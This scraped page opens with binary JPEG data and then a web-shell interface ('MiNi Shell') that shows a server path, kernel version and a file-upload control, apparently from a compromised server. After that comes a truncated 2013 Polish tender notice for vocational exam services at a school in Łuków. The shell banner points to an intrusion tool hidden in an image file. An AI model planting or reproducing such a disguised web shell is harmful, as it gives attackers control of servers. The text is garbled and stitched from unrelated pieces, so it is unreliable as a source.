JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130222/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130222/76156-N-2013.html

<p class="kh_header"><b>Łuków: Przygotowanie i przeprowadzenie egzaminów zawodowych wraz z częściami językowymi z języka angielskiego w ramach projektu pn. Szkoły nowych możliwości - modernizacja kształcenia zawodowego</b><br>
<b>Numer ogłoszenia: 76156 - 2013; data zamieszczenia: 22.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół  Nr 2 im. Aleksandra Świętochowskiego w Łukowie , ul. Warszawska 88, 21-400 Łuków, woj. lubelskie, tel. 25 798 66 34, faks 25 798 66 34.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zs2.lukow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka podległa administracji samorządowej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie i przeprowadzenie egzaminów zawodowych wraz z częściami językowymi z języka angielskiego w ramach projektu pn. Szkoły nowych możliwości - modernizacja kształcenia zawodowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług edukacyjnych polegających na:
-część I - przygotowaniu sprawdzeniu i opracowaniu wyników 4 różnych części językowych z jęz. angielskiego będących elementem egzaminu praktycznego na próbnych egzaminach zawodowych dla zawodów: technik hotelarstwa i technik obsługi turystycznej;
- część II - przygotowaniu, przeprowadzeniu, sprawdzeniu i opracowaniu wyników 3 próbnych egzaminów zawodowych i 3 próbnych praktycznych egzaminów zawodowych dla zawodu technik hotelarstwa;
- część III - przygotowaniu, przeprowadzeniu, sprawdzeniu i opracowaniu wyników 3 próbnych pisemnych egzaminów zawodowych i 3 próbnych praktycznych egzaminów zawodowych dla zawodu kelner (na poziomie technikum);
- część IV -przygotowaniu, przeprowadzeniu, sprawdzeniu i opracowaniu wyników próbnego pisemnego egzaminu zawodowego i próbnego praktycznego egzaminu zawodowego dla zawodu technik obsługi turystycznej,
w Zespole Szkół Nr 2 im. A. Świętochowskiego w Łukowie, w ramach projektu pn.:
Szkoły nowych możliwości - modernizacja kształcenia zawodowego. Projekt
realizowany jest w ramach Programu Operacyjnego Kapitał Ludzki Priorytetu IX Rozwój wykształcenia i kompetencji w regionach Działania 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego współfinansowanego z Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. Celem głównym projektu jest wyższa jakość i atrakcyjność oferty edukacyjnej Zespołu Szkół Nr 2 w Łukowie (Technikum i ZSZ) poprzez wdrożenie 2 programów rozwojowych poprawiających skuteczność edukacji zawodowej oraz podnoszących prestiż ZS2 w regionie. Liderem projektu jest Fundacja Rozwoju Lubelszczyzny, Partnerem - Zespół Szkół nr 2 im. A. Świętochowskiego w Łukowie. Projekt będzie realizowany w Zespole Szkół nr 2 im. A. Świętochowskiego w Łukowie, ul. Warszawska 88, 21-400 Łuków..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.20.00.00-6, 80.20.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia Wykonawcy o spelnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 i art.44 ustawy Prawo zamówień publicznych, złożonego na lub w formie druku stanowiącego załącznik nr 2a, 2b, 2c, 2d do SIWZ (w zależności od części)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia Wykonawcy o spelnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 i art.44 ustawy Prawo zamówień publicznych, złożonego na lub w formie druku stanowiącego załącznik nr 2a, 2b, 2c, 2d do SIWZ (w zależności od części)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia Wykonawcy o spelnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 i art.44 ustawy Prawo zamówień publicznych, złożonego na lub w formie druku stanowiącego załącznik nr 2a, 2b, 2c, 2d do SIWZ (w zależności od części)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony w odniesieniu do Wykonawców, którzy dysponują osobami zdolnymi do wykonania zamówienia, w tym co najmniej jedną osobą posiadającą: - dla części I - wykształcenie wyższe magisterskie, tytuł magistra, przygotowanie pedagogiczne, ukończone studia wyższe lub studia podyplomowe o specjalności język angielski, doświadczenie w pracy w zakresie nauczania języka angielskiego w hotelarstwie/technik obsługi turystycznej; - dla części II - wykształcenie wyższe magisterskie, tytuł magistra, przygotowanie pedagogiczne oraz ukończone studia wyższe lub studia podyplomowe o specjalności hotelarstwo, doświadczenie w pracy w Zespole Nadzorującym przebieg egzaminu zawodowego lub co najmniej dwuletnie doświadczenie w organizowaniu próbnych lub państwowych egzaminów zawodowych; - dla części III - wykształcenie wyższe magisterskie, tytuł magistra, przygotowanie pedagogiczne oraz ukończone studia wyższe lub studia podyplomowe o specjalności hotelarstwo lub gastronomia, doświadczenie w pracy w Zespole Nadzorującym przebieg egzaminu zawodowego lub co najmniej dwuletnie doświadczenie w organizowaniu próbnych lub państwowych egzaminów zawodowych; - dla części IV - wykształcenie wyższe magisterskie, tytuł magistra, przygotowanie pedagogiczne oraz ukończone studia wyższe lub studia podyplomowe o specjalności turystyka, doświadczenie w pracy w Zespołu Nadzorującego przebieg egzaminu zawodowego lub co najmniej dwuletnie doświadczenie w organizowaniu próbnych lub państwowych egzaminów zawodowych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia Wykonawcy o spelnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 i art.44 ustawy Prawo zamówień publicznych, złożonego na lub w formie druku stanowiącego załącznik nr 2a, 2b, 2c, 2d do SIWZ (w zależności od części)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- Oświadczenie o o braku przynależności do grupy kapitałowej lub listę podmiotów należących do tej samej grupy kapitałowej - wg wzoru określonego w załączniku do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) Zamawiający przewiduje możliwość zmiany umowy, w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizacje przedmiotu umowy,
2) Zamawiający przewiduje możliwość zmiany umowy, w przypadku gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń Instytucji, która przyznała środki na sfinansowanie umowy,
3) Konieczności zmiany terminu realizacji przedmiotu umowy z przyczyn niezawinionych przez strony nie może spowodować zmiany ceny wynikającej z oferty, na podstawie której był dokonany wybór Wykonawcy,
4) Zmiana terminu wykonania zamówienia spowodowanej wystąpienia siły wyższej, czyli zdarzenia którego strony nie mogły przewidzieć i któremu nie mogły zapobiec, ani któremu nie mogą przeciwdziałać, a które uniemożliwiają Wykonawcy wykonanie w części lub w całości jego zobowiązań,
5) Zmiana warunków płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu;
6) Zmiana postanowień zawartej umowy może nastąpić wyłącznie w przypadkach przewidzianych ustawą oraz postanowieniami niniejszej Specyfikacji istotnych warunków zamówienia, za zgodą obu Stron wyrażoną na piśmie w formie aneksu do umowy, pod rygorem nieważności takiej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://splukow.bip4.e-zeto.eu/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Łukowie, Wydział Inwestycji i Zamówien Publicznych, ul. Czerwonego Krzyża 4/4, 21-400 Łuków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.03.2013 godzina 10:00, miejsce: Starostwo Powiatowe w Łukowie, ul. Piłsudskiego 17, 21-400 Łuków, sekretariat p. nr 209.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt realizowany jest w ramach Programu Operacyjnego Kapitał Ludzki Priorytetu IX Rozwój wykształcenia i kompetencji w regionach Działania 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego współfinansowanego z Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. Nr ewidencyjny projektu: POKL.09.02.00-06-046/12. Postępowanie prowadzone jest przez Powiat Łukowski z siedzibą przy ul. Piłsudskiego 17, 21-400 Łuków na podstawie udzielonego przez Zamawiającego pełnomocnictwa do przygotowania, przeprowadzenia postępowania oraz podpisania umowy ws. udzielenia zamówienia publicznego. Użyte w dalszej części SIWZ w różnych odmianach wyrażenie Zamawiający należy rozumieć jako Pełnomocnika Zamawiającego (Powiat Łukowski).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przygotowanie, sprawdzenie i opracowanie wyników 4 różnych części językowych z jęz. angielskiego będących elementem egzaminu praktycznego na próbnych egzaminach zawodowych dla zawodów: technik hotelarstwa i technik obsługi turystycznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotowa część zamówienia obejmuje: - przygotowanie 3 różnych autorskich (nigdzie wcześniej niepublikowanych) części językowych z jęz. angielskiego wraz z dokumentacją będących elementem próbnych praktycznych egzaminów zawodowych dla zawodu technik hotelarstwa w następujących terminach: III 2013 r., II 2014 r., II 2015 r. Zamawiający zastrzega sobie prawo żądania opracowania dwóch wersji egzaminów; - przygotowanie autorskiej (nigdzie wcześniej niepublikowanej) części językowej z jęz. angielskiego wraz z dokumentacją będącej elementem próbnego praktycznego egzaminu zawodowego dla zawodu technik obsługi turystycznej w terminie III 2013 r., - sprawdzenie łącznie 87 zadań z dokumentacją oraz dostarczenie wyników nie później niż 3 tygodnie po przeprowadzeniu egzaminów, - opracowanie wyników egzaminów oraz przeprowadzenie pisemnej analizy ze wskazaniem obszarów dobrze i słabo opanowanych, - współpracę z osobą przygotowującą zadanie do części praktycznej próbnego egzaminu zawodowego w zakresie opracowania części zawodowej; - przekazanie przygotowanych egzaminów do dyspozycji Zamawiającego, w celu wykorzystywania ich w pracy nauczycieli języka angielskiego; - pozostawienie dokumentacji przedegzaminacyjnej i poegzaminacyjnej do wglądu dla Zamawiającego; - współpracę z personelem projektu w celu prawidłowej realizacji egzaminów; - przestrzeganie przepisów ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. z 2002 r. Nr 101 poz. 926 z późn. zm.); - wykorzystywanie wzorów dokumentów przekazanych przez Lidera; - prowadzenie miesięcznej ewidencji czasu pracy własnej; - dyspozycyjność w zakresie czynności kontrolno-wyjaśniających (również po terminie wygaśnięcia umowy ws. przedmiotowego zamówienia) wynikających z wytycznych odnośnie realizacji projektów finansowanych ze środków Europejskiego Funduszu Społecznego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.20.00.00-6, 80.20.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przygotowanie, przeprowadzenie, sprawdzenie i opracowanie wyników 3 próbnych egzaminów zawodowych i 3 próbnych praktycznych egzaminów zawodowych dla zawodu technik hotelarstwa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotowa część zamówienia obejmuje: - przygotowanie 3 różnych autorskich (nigdzie wcześniej niepublikowanych) próbnych pisemnych egzaminów zawodowych wraz z dokumentacją dla zawodu technik hotelarstwa, gdzie każdy składa się z 50 pytań sprawdzających wiadomości i umiejętności właściwe dla zawodu technik hotelarstwa oraz 20 pytań sprawdzających wiadomości i umiejętności związane z zatrudnieniem i działalnością gospodarczą w następujących terminach: III 2013 r., II 2014 r., II 2015 r. Zamawiający zastrzega sobie prawo żądania opracowania dwóch wersji egzaminów, - przygotowanie 3 różnych autorskich (nigdzie wcześniej niepublikowanych) zadań wraz z dokumentacją do przeprowadzenia próbnych praktycznych egzaminów zawodowych dla zawodu technik hotelarstwa w następujących terminach: III 2013 r., II 2014 r., II 2015 r. Zamawiający zastrzega sobie prawo żądania opracowania dwóch wersji egzaminów, - organizacja i przeprowadzenie 3 próbnych pisemnych egzaminów zawodowych, gdzie każdy trwa 2 h (60-cio minutowe) i 3 próbnych praktycznych egzaminów zawodowych, gdzie każdy trwa 4 h (60-cio minutowe), w następujących terminach: III/IV 2013 r., II/III 2014 r., II/III 2015 r. Zamawiający zastrzega sobie prawo podania dokładnego terminu egzaminu w terminie 1 miesiąca przed datą egzaminu, - sprawdzenie łącznie 76 testów i 76 zadań z dokumentacją oraz dostarczenie wyników nie później niż 3 tygodnie po przeprowadzeniu egzaminów, - opracowanie wyników egzaminów oraz przeprowadzenie pisemnej analizy ze wskazaniem obszarów dobrze i słabo opanowanych nie później niż 3 tygodnie po przeprowadzeniu egzaminów, - współpracę z osobą przygotowującą element językowy części praktycznej próbnego egzaminu zawodowego, - przekazanie przygotowanych egzaminów do dyspozycji Zamawiającego w celu wykorzystywania ich w pracy nauczycieli przedmiotów zawodowych, - pozostawienie dokumentacji przedegzaminacyjnej i poegzaminacyjnej do wglądu dla Zamawiającego, - współpracę z personelem projektu w celu prawidłowej realizacji egzaminu próbnego, - przestrzeganie przepisów ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. z 2002 r. Nr 101 poz. 926 z późn. zm.), - przestrzeganie przepisów BHP oraz ppoż. w czasie trwania zajęć, -zapewnienie ładu i porządku w czasie egzaminów, bezpieczeństwa uczniów uczestniczącym w egzaminach, - wykorzystywanie wzorów dokumentów przekazanych przez Lidera, - prowadzenie miesięcznej ewidencji czasu pracy własnej, - dyspozycyjność w zakresie czynności kontrolno-wyjaśniających (również po terminie wygaśnięcia umowy ws. przedmiotowego zamówienia) wynikających z wytycznych odnośnie realizacji projektów finansowanych ze środków Europejskiego Funduszu Społecznego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.20.00.00-6, 80.20.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przygotowanie, przeprowadzenie, sprawdzenie i opracowanie wyników 3 próbnych pisemnych egzaminów zawodowych i 3 próbnych praktycznych egzaminów zawodowych dla zawodu kelner (na poziomie technikum).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotowa część zamówienia obejmuje: - przygotowanie 3 różnych autorskich (nigdzie wcześniej niepublikowanych) próbnych pisemnych egzaminów zawodowych wraz z dokumentacją dla zawodu kelner, gdzie każdy składa się z 50 pytań sprawdzających wiadomości i umiejętności właściwe dla zawodu kelner oraz 20 pytań sprawdzających wiadomości i umiejętności związane z zatrudnieniem i działalnością gospodarczą w następujących terminach: III 2013 r., II 2014 r., II 2015 r. Zamawiający zastrzega sobie prawo żądania opracowania dwóch wersji egzaminów; - przygotowanie 3 różnych autorskich (nigdzie wcześniej niepublikowanych) zadań wraz z dokumentacją do przeprowadzenia próbnych praktycznych egzaminów zawodowych dla zawodu technik hotelarstwa w następujących terminach: III 2013 r., II 2014 r., II 2015 r. Zamawiający zastrzega sobie prawo żądania opracowania dwóch wersji egzaminów; - organizacja i przeprowadzenie 3 próbnych pisemnych egzaminów zawodowych, gdzie każdy trwa 2 h (60-cio minutowe) i 3 próbnych praktycznych egzaminów zawodowych, gdzie każdy trwa 3 h (60-cio minutowe), w następujących terminach: III/IV 2013 r., II/III 2014 r., II/III 2015 r. Zamawiający zastrzega sobie prawo podania dokładnego terminu egzaminu w terminie 1 miesiąca przed datą egzaminu; - sprawdzenie łącznie 36 testów i 36 zadań oraz dostarczenie wyników nie później niż 3 tygodnie po przeprowadzeniu egzaminów; - opracowanie wyników egzaminów oraz przeprowadzenie pisemnej analizy ze wskazaniem obszarów dobrze i słabo opanowanych nie później niż 3 tygodnie po przeprowadzeniu egzaminów; - przekazanie przygotowanych egzaminów do dyspozycji Zamawiającego w celu wykorzystywania ich w pracy nauczycieli przedmiotów zawodowych, - pozostawienie dokumentacji przedegzaminacyjnej i poegzaminacyjnej do wglądu dla Zamawiającego, - współpracę z personelem projektu w celu prawidłowej realizacji próbnych egzaminów zawodowych; - przestrzeganie przepisów ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. z 2002 r. Nr 101 poz. 926 z późn. zm.); - przestrzeganie przepisów BHP oraz ppoż. w czasie trwania 